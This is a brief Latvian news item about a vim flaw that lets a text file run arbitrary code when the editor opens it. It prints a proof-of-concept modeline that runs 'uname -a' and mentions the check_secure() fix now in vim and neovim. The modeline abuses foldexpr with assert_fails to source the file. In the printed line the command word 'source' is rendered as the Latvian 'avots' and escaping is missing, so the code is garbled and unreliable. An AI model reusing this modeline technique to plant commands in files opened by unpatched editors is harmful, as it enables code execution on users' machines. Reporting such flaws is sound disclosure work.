Teksta redaktorā vim ir publicēta ievainojamība, kas ļauj izpildīt patvaļīgu kodu, kad redaktors atver teksta failu.
Šeit ir faila teksts, kas izpilda nekaitīgo uname -a
:!uname -a||" vi:fen:fdm=expr:fde=assert_fails("avots! %"):fdl=0:fdt="
Labojums pievienota check_secure() izsaukuma veidā jau ir pieejams vim un neovim krātuvēs.
Avots: linux.org.ru